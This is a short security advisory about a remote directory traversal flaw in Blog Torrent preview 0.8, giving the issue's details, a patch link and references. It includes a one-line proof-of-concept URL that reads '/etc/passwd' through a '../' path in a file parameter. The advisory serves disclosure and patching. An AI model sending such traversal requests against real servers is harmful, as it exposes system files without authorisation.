Blog Torrent Remote Directory Traversal Vulnerability
BID:11795
Info
Blog Torrent Remote Directory Traversal Vulnerability
| Bugtraq ID: | 11795 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 02 2004 12:00AM |
| Updated: | Dec 02 2004 12:00AM |
| Credit: | Discovery is credited to Steve Kemp <[email protected]>. |
| Vulnerable: |
Blog Torrent Blog Torrent preview 0.8 |
| Not Vulnerable: | |
Discussion
Blog Torrent Remote Directory Traversal Vulnerability
It is reported that Blog Torrent is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied input.
Blog Torrent preview 0.8 version is affected by this vulnerability.
It is reported that Blog Torrent is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied input.
Blog Torrent preview 0.8 version is affected by this vulnerability.
Exploit / POC
Blog Torrent Remote Directory Traversal Vulnerability
An exploit is not required.
The following proof of concept is available:
htp://www.example.com/battletorrent/btdownload.php?type=torrent&file=../../etc/passwd
An exploit is not required.
The following proof of concept is available:
htp://www.example.com/battletorrent/btdownload.php?type=torrent&file=../../etc/passwd
Solution / Fix
Blog Torrent Remote Directory Traversal Vulnerability
Solution:
A CVS patch is available from the following location:
http://cvs.sourceforge.net/viewcvs.py/battletorrent/btorrent_server/btdownload.php?r1=1.6&r2=1.7
Solution:
A CVS patch is available from the following location:
http://cvs.sourceforge.net/viewcvs.py/battletorrent/btorrent_server/btdownload.php?r1=1.6&r2=1.7
References
Blog Torrent Remote Directory Traversal Vulnerability
References:
References:
- Blog Torrent Home Page (Blog Torrent)
- Blog Torrent preview 0.8 - arbitary file download (Steve Kemp
)